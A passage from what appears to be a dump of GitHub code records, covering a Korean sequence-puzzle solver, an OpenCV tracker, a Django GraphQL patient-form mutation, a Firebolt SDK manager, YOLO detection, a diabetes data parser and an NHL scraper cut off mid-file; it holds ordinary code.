range(%d):\\n'%50\n out = out + ' if i==0: seq.append(c0)\\n'\n out = out + ' elif i==1: seq.append(c1)\\n'\n out = out + ' else: seq.append(seq[i-2]*c2+seq[i-1]*c3)\\n'\n\n if str(type(target))==\"\":\n out = out + 'print(%s)'%target\n else:\n out = out + 'print(seq[%d])'%(target-1)\n return out\n\ndef find_index_string(seq, w):\n key = 0\n if w=='A': key = -1\n if w=='B': key = -2\n if w=='C': key = -3\n if w=='D': key = -4\n if w=='X': key = -5\n if w=='Y': key = -6\n if w=='Z': key = -7\n\n\n if key==0:\n return 0\n else:\n return seq.index(key)\n\ndef get_n_seq(seq):\n\n seq_new = [x for x in seq if x>=0]\n n_seq = len(seq_new)\n\n return n_seq\n\ndef seq_pred(seq_str,targets=[],eqs=''):\n if LOCAL: print('initial:', targets, eqs)\n seq_ori = seq_str\n\n seq_str = seq_str.replace('A', '-1')\n seq_str = seq_str.replace('B', '-2')\n seq_str = seq_str.replace('C', '-3')\n seq_str = seq_str.replace('D', '-4')\n seq_str = seq_str.replace('X', '-5')\n seq_str = seq_str.replace('Y', '-6')\n seq_str = seq_str.replace('Z', '-7')\n\n if LOCAL: print(seq_str)\n\n seq = eval(seq_str)\n target = None\n\n if len(targets)==1:\n target = targets[0]\n\n if str(type(seq[0]))==\"\" :\n if LOCAL: print('string')\n return find_seq_string(seq,len(seq)+1)\n\n n_seq = get_n_seq(seq)\n if LOCAL: print(\"no of seq:\", n_seq)\n c,loss,seq_type = solve_seq_pattern(seq, [seq[0],1,0,0,0])\n\n if LOCAL: print('targets=', targets)\n if str(type(target))==\"\":\n if target.isdigit() == True:\n target = int(target)\n\n if len(targets)>1:\n if LOCAL: print('multiple target! output eq:',targets)\n code = \"\"\n for idx, tar in enumerate(targets):\n if idx==0:\n A = cal_seq(c,tar,seq_type)\n if LOCAL: print('A=',A)\n if seq_type == 2:\n code = code +\"A = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'A=%d\\n'%A\n elif idx==1:\n B = cal_seq(c,tar,seq_type)\n if LOCAL: print('B=',B)\n if seq_type == 2:\n code = code +\"B = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'B=%d\\n'%B\n elif idx==2:\n C = cal_seq(c,tar,seq_type)\n if LOCAL: print('C=',C)\n if seq_type == 2:\n code = code +\"C = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'C=%d\\n'%C\n elif idx==3:\n D = cal_seq(c,tar,seq_type)\n if LOCAL: print('D=',D)\n if seq_type == 2:\n code = code +\"D = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'D=%d\\n'%D\n\n elif idx==4:\n X = cal_seq(c,tar,seq_type)\n if LOCAL: print('X=',X)\n if seq_type == 2:\n code = code +\"X = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'X=%d\\n'%X\n\n elif idx==5:\n Y = cal_seq(c,tar,seq_type)\n if LOCAL: print('Y=',Y)\n if seq_type == 2:\n code = code +\"Y = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'Y=%d\\n'%Y\n elif idx==6:\n Z = cal_seq(c,tar,seq_type)\n if LOCAL: print('Z=',Z)\n if seq_type == 2:\n code = code +\"Z = %f+%f*%d+%f*%d**2+%f*%d**3\\n\"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n else:\n code = code +'Z=%d\\n'%Z \n \n out = eval(eqs)\n if LOCAL: print('eqs:', eqs)\n if LOCAL: print(eqs, out)\n code = code + 'print(int(round(%s)))'%eqs\n return out, code\n\n if LOCAL: print('target:',target)\n if str(type(target))==\"\": \n if loss > 1:\n if LOCAL: print('solve by string pattern (int target)')\n return find_seq_string(seq,target)\n else:\n if LOCAL: print(\"simple seq\")\n if LOCAL: print_seq(c,seq_type)\n return cal_seq(c,target,seq_type), print_seq_eq(c,target,seq_type)\n else:\n if LOCAL: print(\"case of equation output\")\n if loss > 1:\n if LOCAL: print('solve by string pattern(string target')\n return find_seq_string(seq,eqs)\n else:\n if LOCAL: print_seq(c,seq_type)\n \n out, code = find_seq(seq,c,eqs,seq_type)\n \n index = find_index_string(seq,eqs)\n if index ==0:\n return out, code+ print_seq_eq(c,eqs,seq_type)\n else:\n return out, code+ print_seq_eq(c,index+1,seq_type)\n\n## find variable by optimization...\ndef solve(eq):\n eq = '(('+eq+'))**2'\n eq = eq.replace('=',')-(')\n if LOCAL: print(eq)\n\n def cal_loss(x):\n out = eval(eq)\n return out\n\n out = optimize.fmin(cal_loss, 0, xtol=0.00000001, ftol=0.00000001, maxiter=1500, full_output=True, disp=DEBUG)\n\n out = round(out[0][0],2)\n if LOCAL: print(out)\n\n return \n\n\nkorean = re.compile('[\\u3131-\\u3163\\uac00-\\ud7a3]+')\nspecial_char = '?.,_'\ndef delete_str(word, chars):\n\n for char in chars:\n word = word.replace(char,'')\n return word\n\n\ndef solve_seq(input):\n\n text_nokor= re.sub(korean, '_', input).strip()\n if LOCAL: print(text_nokor)\n\n words = re.findall(r\"[\\w']+\", text_nokor)\n find_num = False\n seqs = []\n\n if LOCAL: print(words)\n\n for word in words:\n\n if word.isalnum() :\n if word.isdigit()==True:\n find_num = True\n seqs.append(word)\n else:\n n = input.index(word)\n if find_num == True or input[n+1] == ',':\n find_num = True\n seqs.append(word)\n\n if find_num == True:\n if word.isalnum() == False:\n word = word.split('_')[0]\n if word!='':\n seqs.append(word)\n break\n\n if LOCAL: print(\"sequence list:\",seqs)\n seq_str= \",\".join(seqs)\n if LOCAL: print(seq_str)\n\n\n words = text_nokor.split(' ')\n eqs = ''\n\n targets = find_target_no(input)\n \n for word in words:\n word = delete_str(word, special_char)\n word = word.replace(' ','')\n\n if word!='':\n eqs = word\n\n if LOCAL: print(\"ans:\", eqs)\n\n return seq_pred(seq_str, targets, eqs)\n\n\ndef find_target_no(inp):\n if '번 째' in inp:\n inp = inp.replace('번 째', '번째')\n elif not('번째' in inp):\n inp = inp.replace('째', '번째')\n inp = inp.replace('번째', ' 번째')\n \n if LOCAL: print(inp)\n \n words = inp.split(' ')\n targets = []\n target = 0\n for idx, word in enumerate(words):\n if '번째' in word:\n w = words[idx-1]\n if '첫' in w:\n target = 1\n elif '두' in w:\n target = 2\n elif '세' in w:\n target = 3\n else:\n target = int(w)\n targets.append(target)\n\n if LOCAL: print(targets)\n return targets\n \n\ndef seq_solver(question:str, local = False):\n global LOCAL\n LOCAL = local\n\n ans, code = solve_seq(question)\n ans = int(round(ans))\n if local:\n print('ans:',ans)\n print(code)\n return { 'answer': ans, 'equation': code}\n\n\nif __name__ == \"__main__\":\n q_list = [\"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B-A에 해당하는 알맞은 수는 무엇일까요?\",\n \"2, 4, 8, 14, 22 에서 7번째에 올 수를 구하시오.\",\n \"1, 17, 33, 49, 65와 같은 규칙에서 25번째 놓일 수와 40번째 놓일 수를 각각 A와 B라 할 때, B-A를 구하시오.\",\n \"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B-A에 해당하는 알맞은 수는 무엇일까요?\",\n \"2, 4, 8, 14, 22 에서 7번째에 올 수를 구하시오.\",\n \"1, 17, 33, 49, 65와 같은 규칙에서 25번째 놓일 수와 40번째 놓일 수를 각각 A와 B라 할 때, B-A를 구하시오.\",\n \"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B에 해당하는 알맞은 수는 무엇일까요?\",\n \"1,2,3,4,5,6,7,1,2,3,4,5,6,7과 같이 반복되는 수열이 있습니다. 왼쪽에서 57번째 숫자는 무엇입니까?\",\n \"1, 5, 14, 30, 55, 91과 같은 규칙으로 수를 배열하고 있습니다. 9번째 수는 무엇입니까?\",\n \"자연수를 규칙에 따라 4, 7, 10, A, 16, 19로 배열하였습니다. A에 알맞은 수를 구하시오.\"]\n for i, q in enumerate(q_list):\n a = seq_solver(q, False)['answer']\n print(f\"{i+1:2d} 번째 문제\\n - {'문제':2s}: {q}\\n - {'답':^3s}: {a}\\n\")\n","repo_name":"jkc-ai/mwp-korean-2021","sub_path":"solver/seq_solver.py","file_name":"seq_solver.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11527463705","text":"import cv2\n\n\ndef main():\n cam = cv2.VideoCapture(0)\n tracker = cv2.Tracker_()\n while True:\n (ok, frame) = cam.read()\n if not ok:\n break\n # Start timer\n timer = cv2.getTickCount()\n\n # Update tracker\n (ok, bbox) = tracker.update(frame)\n\n # Calculate Frames per second (FPS)\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n # Draw bounding box\n if ok:\n draw_target(frame, bbox)\n else:\n # Tracking failure\n print(\"Failed to detect\")\n # Display tracker type on frame\n cv2.putText(frame, \" Tracker\", (100, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);\n # Display FPS on frame\n cv2.putText(frame, \"FPS : \" + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);\n # Display result\n cv2.imshow(\"Tracking\", frame)\n # Teclado\n key = cv2.waitKey(10)\n if key == 27:\n break\n cam.release()\n cv2.destroyAllWindows()\n\n\ndef draw_target(img, box):\n (height, width, _) = img.shape\n (x, y, w, h) = box\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 1)\n # Scope\n s_x = int(x + w / 2)\n s_y = int(y + h / 2)\n cv2.line(img, (0, s_y), (width, s_y), (0, 0, 200), 2)\n cv2.line(img, (s_x, 0), (s_x, height), (0, 0, 200), 2)\n cv2.circle(img, (s_x, s_y), 10, (0, 0, 200), 2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Migarve55/omni-turret-control","sub_path":"vision/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72215795367","text":"import numpy as np\n\ndef main(number_of_lines):\n types = ['/index', '/test', '/home']\n with open('log.txt', 'w') as file:\n for i in range(number_of_lines):\n file.write('{},{},{}\\n'.format(\n i, types[np.random.randint(0, 3)], np.random.binomial(1, 0.3)))\n\nif __name__ == '__main__':\n main(1000000)\n","repo_name":"NikolayLutsyak/testing_to_ya_taxi","sub_path":"make_log.py","file_name":"make_log.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17717925693","text":"import graphene\nfrom stewardship.models import (\n Sepsis,\n Patient,\n FocusOfInfection,\n CultureReport,\n ClinicalSign,\n AntibioticSensitivity,\n Antibiotic,\n Imaging,\n PatientForm,\n)\nfrom stewardship.graphql.types import PatientDataFormObj\nfrom stewardship.graphql.inputs import PatientFormInput\nfrom main.api.API_Exceptions import APIException\n\n\nclass PatientFormResponse(graphene.ObjectType):\n success = graphene.Boolean()\n returning = graphene.Field(PatientDataFormObj)\n\n\nclass PatientDataForm(graphene.Mutation, description=\"Patient Daily data form\"):\n class Arguments:\n inputs = graphene.Argument(\n PatientFormInput,\n required=True,\n description=\"inputs available for creation\",\n )\n\n @staticmethod\n def mutate(self, info, inputs: PatientFormInput):\n patientObject = Patient.objects.get(id=inputs.patient)\n\n sepsis = Sepsis.objects.create(\n isSepsis=inputs.sepsis.isSepsis,\n isSepticShock=inputs.sepsis.isSepticShock,\n isNeutropenicSepsis=inputs.sepsis.isNeutropenicSepsis,\n )\n\n focusOfInfection = FocusOfInfection.objects.create(\n isUTI=inputs.focusOfInfection.isUTI,\n isCNS=inputs.focusOfInfection.isCNS,\n isPneumonia=inputs.focusOfInfection.isPneumonia,\n isSkin=inputs.focusOfInfection.isSkin,\n isAbdominal=inputs.focusOfInfection.isAbdominal,\n isPrimaryBacteraemia=inputs.focusOfInfection.isPrimaryBacteraemia,\n isSecondaryBacteraemia=inputs.focusOfInfection.isSecondaryBacteraemia,\n isCatheterLinesStents=inputs.focusOfInfection.isCatheterLinesStents,\n isCAI = inputs.focusOfInfection.isCAI,\n isHAI = inputs.focusOfInfection.isHAI,\n other=inputs.focusOfInfection.other,\n )\n\n culture_reports = []\n for culture_report_input in inputs.cultureReport:\n imaging = Imaging.objects.create(\n isxRay=culture_report_input.Imaging.isxRay,\n isCTScan=culture_report_input.Imaging.isCTScan,\n isMRI=culture_report_input.Imaging.isMRI,\n isUltraSound=culture_report_input.Imaging.isUltraSound,\n isPETScan=culture_report_input.Imaging.isPETScan,\n impression=culture_report_input.Imaging.impression,\n )\n antibioticSensitivityList = []\n for antibiotics in culture_report_input.antibioticSensitivity:\n antibioticSensitivity = AntibioticSensitivity.objects.create(\n antibiotic=antibiotics,\n )\n antibioticSensitivityList.append(antibioticSensitivity)\n\n culture_report = CultureReport.objects.create(\n time_sent=culture_report_input.timeSent,\n time_reported=culture_report_input.timeReported,\n sentBeforeAntibiotic=culture_report_input.sentBeforeAntibiotic,\n multi_drug_resistant=culture_report_input.multiDrugResistance,\n specimen_type=culture_report_input.specimenType,\n site_of_collection=culture_report_input.siteOfCollection,\n organism=culture_report_input.organism,\n resistance=culture_report_input.resistance,\n Imaging=imaging,\n )\n culture_report.antibiotic_sensitivity.set(antibioticSensitivityList)\n culture_reports.append(culture_report)\n\n antibiotics_used = []\n for antibiotic_used_input in inputs.antibioticUsed:\n antibiotic_used = Antibiotic.objects.create(\n initial_date=antibiotic_used_input.initialDate,\n antibiotic=antibiotic_used_input.antibiotic,\n loading_dose=antibiotic_used_input.loadingDose,\n maintenance_dose=antibiotic_used_input.maintenanceDose,\n route=antibiotic_used_input.route,\n frequency=antibiotic_used_input.frequency,\n duration=antibiotic_used_input.duration,\n end_date=antibiotic_used_input.endDate,\n )\n antibiotics_used.append(antibiotic_used)\n\n clinical_signsList = []\n for clinical_signs_input in inputs.clinicalSign:\n clinical_signs = ClinicalSign.objects.create(\n date=clinical_signs_input.date,\n patient=patientObject,\n procalcitonin=clinical_signs_input.procalcitonin,\n white_blood_cell=clinical_signs_input.whiteBloodCell,\n neutrophil=clinical_signs_input.neutrophil,\n s_creatinine=clinical_signs_input.sCreatinine,\n cratinine_clearance=clinical_signs_input.cratinineClearance,\n o2_saturation=clinical_signs_input.o2Saturation,\n blood_pressure=clinical_signs_input.bloodPressure,\n temperature=clinical_signs_input.temperature,\n )\n clinical_signsList.append(clinical_signs)\n\n try:\n patientForm = PatientForm.objects.create(\n patient=patientObject,\n review_date=inputs.reviewDate,\n review_department=inputs.reviewDepartment,\n provisional_diagnosis=inputs.provisionalDiagnosis,\n final_diagnosis=inputs.finalDiagnosis,\n syndromic_diagnosis=inputs.syndromicDiagnosis,\n diagnosis_choice=inputs.diagnosisChoice,\n focus_of_infection=focusOfInfection,\n sepsis=sepsis,\n isculture_report=True,\n draft=inputs.draft,\n )\n patientForm.culture_report.set(culture_reports)\n patientForm.antibiotic_used.set(antibiotics_used)\n\n except Exception as e:\n print(\"Error: \", e)\n raise APIException(message=e, code=400)\n \n if inputs.draft == False:\n patientObject.lastReviewDate = inputs.reviewDate\n patientObject.save()\n\n try:\n if PatientForm.objects.filter(patient=inputs.patient, draft=True).exists():\n form = PatientForm.objects.get(patient=inputs.patient, draft=True)\n form.delete()\n # make a not found error\n except Exception as e:\n print(\"Error: \", e)\n raise APIException(message=e, code=400)\n\n patientForm.save()\n\n return PatientFormResponse(success=True, returning=patientForm)\n\n Output = PatientFormResponse\n","repo_name":"anshuman-8/antibiotic-stewardship-server","sub_path":"stewardship/graphql/mutations/patientDataForm.py","file_name":"patientDataForm.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38601111231","text":"import sys\n\n\ndef main():\n nums = list(map(int, input().split()))\n lookup = dict()\n a, c = min(nums), max(nums)\n b = [i for i in nums if a < i < c][0]\n\n lookup['A'], lookup['B'], lookup['C'] = str(a), str(b), str(c)\n res = []\n for i in input():\n res.append(lookup[i])\n\n print(' '.join(res))\n\n\nif __name__== '__main__':\n main()\n","repo_name":"fr3632ho/various","sub_path":"src/easy/ABC/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22978078165","text":"from tts_tools.libtts import GAMEDATA_DEFAULT\nfrom tts_tools.prefetch import prefetch_files\n\nimport argparse\nimport signal\nimport sys\n\n\nparser = argparse.ArgumentParser(\n description=\"Download assets referenced in TTS .json files.\"\n)\n\nparser.add_argument(\n \"infile_names\",\n metavar=\"FILENAME\",\n nargs=\"+\",\n help=\"The save file or mod in JSON format.\",\n)\n\nparser.add_argument(\n \"--gamedata\",\n dest=\"gamedata_dir\",\n metavar=\"PATH\",\n default=GAMEDATA_DEFAULT,\n help=\"The path to the TTS game data directory.\",\n)\n\nparser.add_argument(\n \"--dry-run\",\n \"-n\",\n dest=\"dry_run\",\n default=False,\n action=\"store_true\",\n help=\"Only print which files would be downloaded.\",\n)\n\nparser.add_argument(\n \"--refetch\",\n \"-r\",\n dest=\"refetch\",\n default=False,\n action=\"store_true\",\n help=\"Rewrite objects that already exist in the cache.\",\n)\n\nparser.add_argument(\n \"--relax\",\n \"-x\",\n dest=\"ignore_content_type\",\n default=False,\n action=\"store_true\",\n help=\"Do not abort when encountering an unexpected MIME type.\",\n)\n\nparser.add_argument(\n \"--timeout\",\n \"-t\",\n dest=\"timeout\",\n default=5,\n type=int,\n help=\"Connection timeout in s.\",\n)\nparser.add_argument(\n \"--user-agent\",\n \"-a\",\n dest=\"user_agent\",\n default=\"tts-backup\",\n help=\"HTTP user-agent string.\",\n)\n\n\ndef sigint_handler(signum, frame):\n sys.exit(1)\n\n\ndef console_entry():\n\n signal.signal(signal.SIGINT, sigint_handler)\n signal.signal(signal.SIGTERM, sigint_handler)\n args = parser.parse_args()\n prefetch_files(args)\n","repo_name":"eigengrau/tts-backup","sub_path":"src/tts_tools/prefetch/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} +{"seq_id":"35503175415","text":"\r\n#N1\r\ndef min_value(dict):\r\n values = dict.values()\r\n return min(values)\r\n\r\ndict1 = {'1' : 10, '2' : 20, '3' : 30, '4' : 40}\r\nminimum_value = min_value(dict1)\r\nprint(minimum_value)\r\n\r\n#N2\r\ndef factorial(x):\r\n if x == 0:\r\n return 1\r\n else:\r\n return x * factorial(x - 1)\r\nnum= int(input('შეიყვანეთ რიცხვი:'))\r\nresult = factorial(num)\r\nprint(num, 'ის ფაქტორიალი არის:', result)","repo_name":"mebonia/skillwill","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26201811886","text":"from sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfrom data_prepocessing import load_dataset\r\nfrom lab1.my_knn import MyKNN\r\nfrom lab1.my_naive_bayes import MyGaussianNaiveBayes\r\n\r\n\r\ndef main():\r\n # готовим датасет\r\n inputs_train, outputs_train, inputs_test, outputs_test = load_dataset(split_ratio=.4, normalize=True)\r\n # готовим классификаторы\r\n classificators = [\r\n MyGaussianNaiveBayes(),\r\n GaussianNB(),\r\n MyKNN(n_neighbors=75),\r\n KNeighborsClassifier(n_neighbors=75)\r\n ]\r\n # оцениваем работу каждого классификатора\r\n for clf in classificators:\r\n clf.fit(inputs_train, outputs_train)\r\n print(clf, '\\nAccuracy: ', clf.score(inputs_test, outputs_test), '\\n--------------')\r\n\r\nmain()\r\n","repo_name":"Omenstudio/ITMO-labs-machine-learning","sub_path":"lab1/lab_1_main.py","file_name":"lab_1_main.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22370124778","text":"import logging\nfrom typing import Optional\n\nfrom httpx import Timeout\n\nfrom firebolt.client import (\n DEFAULT_API_URL,\n Auth,\n Client,\n log_request,\n log_response,\n raise_on_4xx_5xx,\n)\nfrom firebolt.common import Settings\nfrom firebolt.db import connect\nfrom firebolt.utils.util import fix_url_schema\n\nDEFAULT_TIMEOUT_SECONDS: int = 60 * 2\n\nlogger = logging.getLogger(__name__)\n\nSETTINGS_DEPRECATION_MESSAGE = \"\"\"\nUsing Settings objects for ResourceManager intialization is deprecated.\nPlease pass parameters directly\nExample:\n >>> rm = ResourceManager(auth=ClientCredentials(..), account_name=\"my_account\", ..)\n\"\"\"\n\n\nclass ResourceManager:\n \"\"\"\n ResourceManager to access various Firebolt resources:\n\n - databases\n - engines\n\n Also provides listings of:\n\n - instance types (AWS instance types which engines can use)\n \"\"\"\n\n __slots__ = (\n \"account_name\",\n \"account_id\",\n \"api_endpoint\",\n \"_client\",\n \"_connection\",\n \"regions\",\n \"instance_types\",\n \"_provider_id\",\n \"databases\",\n \"engines\",\n \"engine_revisions\",\n \"bindings\",\n )\n\n def __init__(\n self,\n settings: Optional[Settings] = None,\n auth: Optional[Auth] = None,\n account_name: Optional[str] = None,\n api_endpoint: str = DEFAULT_API_URL,\n ):\n if settings:\n logger.warning(SETTINGS_DEPRECATION_MESSAGE)\n if auth or account_name or (api_endpoint != DEFAULT_API_URL):\n raise ValueError(\n \"Other ResourceManager parameters are not allowed \"\n \"when Settings are provided\"\n )\n auth = settings.auth\n account_name = settings.account_name\n api_endpoint = settings.server\n\n for param, name in (\n (auth, \"auth\"),\n (account_name, \"account_name\"),\n ):\n if not param:\n raise ValueError(f\"Missing {name} value\")\n\n # type checks\n assert auth is not None\n assert account_name is not None\n\n self._client = Client(\n auth=auth,\n base_url=fix_url_schema(api_endpoint),\n account_name=account_name,\n api_endpoint=api_endpoint,\n timeout=Timeout(DEFAULT_TIMEOUT_SECONDS),\n event_hooks={\n \"request\": [log_request],\n \"response\": [raise_on_4xx_5xx, log_response],\n },\n )\n self._connection = connect(\n auth=auth,\n account_name=account_name,\n api_endpoint=api_endpoint,\n )\n self.account_name = account_name\n self.api_endpoint = api_endpoint\n self.account_id = self._client.account_id\n self._init_services()\n\n def _init_services(self) -> None:\n # avoid circular import\n from firebolt.service.database import DatabaseService\n from firebolt.service.engine import EngineService\n from firebolt.service.instance_type import InstanceTypeService\n\n # Cloud Platform Resources (AWS)\n self.instance_types = InstanceTypeService(resource_manager=self)\n\n # Firebolt Resources\n self.databases = DatabaseService(resource_manager=self)\n self.engines = EngineService(resource_manager=self)\n\n def __del__(self) -> None:\n if hasattr(self, \"_client\"):\n self._client.close()\n if hasattr(self, \"_connection\"):\n self._connection.close()\n","repo_name":"firebolt-db/firebolt-python-sdk","sub_path":"src/firebolt/service/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"4698411767","text":"from django import forms\n\nfrom road.models import Point\nfrom users.models import Commissioner\n\n\nclass ChangePointCommissionerForm(forms.ModelForm):\n class Meta:\n model = Commissioner\n fields = ['point']\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop('user', None)\n super(ChangePointCommissionerForm, self).__init__(*args, **kwargs)\n point_choices = [(x.id, x.get_name_with_section) for x in\n Point.objects.filter(section=user.commissioner.section).order_by('name')]\n self.fields['point'].choices = point_choices\n","repo_name":"Ganibalishe/ossp","sub_path":"ossp/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18835857451","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nnet=cv2.dnn.readNet(\"yolov3.weights\",\"yolov3.cfg\")\r\nCLASSES=[]\r\nwith open(\"coco.names\",\"r\")as f:\r\n CLASSES=[line.strip() for line in f.readlines()]\r\nprint(CLASSES)\r\nlayer_names=net.getLayerNames()\r\noutputlayers=[layer_names[i-1] for i in net.getUnconnectedOutLayers()]\r\n\r\nimg=cv2.imread(\"sample9.jpg\")\r\nimg=cv2.resize(img,(512,512),fx=0.4,fy=0.4)\r\nheight,width,channels=img.shape\r\n\r\n\r\ndef object_detection(img):\r\n blob=cv2.dnn.blobFromImage(img,0.00392,(416,416),(0,0,0),True,crop=False)\r\n\r\n net.setInput(blob)\r\n outs=net.forward(outputlayers)\r\n boxes=[]\r\n class_ids=[]\r\n confidences=[]\r\n # for each detetion from each output layer \r\n# get the confidence, class id, bounding box params\r\n# and ignore weak detections (confidence < 0.5)\r\n for out in outs:\r\n for detection in out:\r\n scores=detection[5:]\r\n class_id=np.argmax(scores)\r\n confidence=scores[class_id]\r\n if confidence>0.5:\r\n center_x=int(detection[0]*width)\r\n center_y=int(detection[1]*height)\r\n w=int(detection[2]*width)\r\n h=int(detection[3]*height)\r\n x=int(center_x -w/2)\r\n y=int(center_y -h/2)\r\n boxes.append([x,y,w,h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n indexes=cv2.dnn.NMSBoxes(boxes,confidences,0.5,0.4)\r\n \r\n font=cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n x,y,w,h=boxes[i]\r\n label=str(CLASSES[class_ids[i]])\r\n \r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,512,0),2)\r\n cv2.imshow(\"Image\",img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\nobject_detection(img)\r\n","repo_name":"Gayathri-28/ObjectDetectionInWater","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40671440177","text":"from ast import Dict\nimport pandas as pd\nimport numpy as np\n\n\nclass ParserDiabete:\n def __init__(\n self,\n raw: pd.DataFrame,\n ):self.raw = raw\n\n def parse(self, items: Dict):\n data = self.raw\n parsedData = pd.DataFrame(columns=items.keys())\n for i in range(0, len(data)):\n list = data.loc[i]\n line = np.zeros(23, dtype=int)\n line[self.checkBloodPressure(list.loc[\"BloodPressure\"]) - 1] = 1\n line[self.checkAge(list.loc[\"Age\"]) - 1] = 1\n line[self.checkBMI(list.loc[\"BMI\"]) - 1] = 1\n line[self.checkGlucose(list.loc[\"Glucose\"]) - 1] = 1\n line[self.checkOutcome(list.loc[\"Outcome\"]) - 1] = 1\n line[self.checkPregnancies(list.loc[\"Pregnancies\"]) - 1] = 1\n new_df = pd.DataFrame([line], columns=items.keys())\n parsedData = pd.concat([parsedData, new_df], axis=0, ignore_index=True)\n parsedData.to_csv(\"BinaryTransactions.csv\")\n return parsedData\n\n def getFeatures(self):\n data = self.raw\n i = 1\n features = {}\n for feature in data.columns.values:\n features[i] = feature\n i = i + 1\n return features\n\n def checkGlucose(self, glucose: float):\n i = 0\n if glucose <= 140:\n i = 1\n elif glucose < 200:\n i = 2\n else:\n i = 3\n return i\n\n def checkBloodPressure(self, mesure: float):\n i = 0\n if mesure < 80:\n i = 4\n elif 80 <= mesure < 90:\n i = 5\n else:\n i = 6\n return i\n\n def checkBMI(self, bmi: float):\n i = 0\n if bmi < 18.5:\n i = 7\n elif bmi <= 24.9:\n i = 8\n elif bmi <= 29.9:\n i = 9\n else:\n i = 10\n return i\n\n def checkAge(self, age: int):\n i = 0\n if age < 10:\n i = 11\n elif age < 20:\n i = 12\n elif age < 30:\n i = 13\n elif age < 40:\n i = 14\n elif age < 60:\n i = 15\n elif age < 80:\n i = 16\n else:\n i = 17\n return i\n\n def checkOutcome(self, var: float):\n i = 0\n if var == 1:\n i = 18\n else:\n i = 19\n return i\n\n def checkPregnancies(self, var: float):\n i = 0\n if var == 0:\n i = 20\n elif var < 5:\n i = 21\n elif var < 10:\n i = 22\n else: \n i=23\n return i\n\n\n","repo_name":"mashateayoub/DM_DECLAT_MP","sub_path":"Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31894435614","text":"from pymongo import MongoClient\nimport requests\nfrom bs4 import BeautifulSoup\n\nclient = MongoClient()\ndb = client.Hockey\nteams = db.Teams\n\n\nurl = \"http://www.nhl.com/ice/teams.htm?navid=nav-tms-main\"\nr = requests.get(url)\nsoup = BeautifulSoup(r.content)\n\ng_data = soup.find_all(\"div\", {\"class\":\"teamContainer\"})\n\n#Gather Team data\nfor item in g_data:\n print ('--------------WEST-CONF-------------------')\n westConf = item.contents[0]\n print ('**Pacific Div**')\n pacDiv = westConf.find_all(\"div\", {\"class\":\"pacific\"})\n pacplaces = pacDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n paccommons = pacDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n x = 0\n wc_pacplace = {}\n for pacplace in pacplaces:\n #print pacplace.text\n wc_pacplace[x] = pacplace.text\n x = x + 1\n\n y = 0\n wc_paccommon = {}\n for paccommon in paccommons:\n #print paccommon.text\n wc_paccommon[y] = paccommon.text\n y = y + 1\n\n print 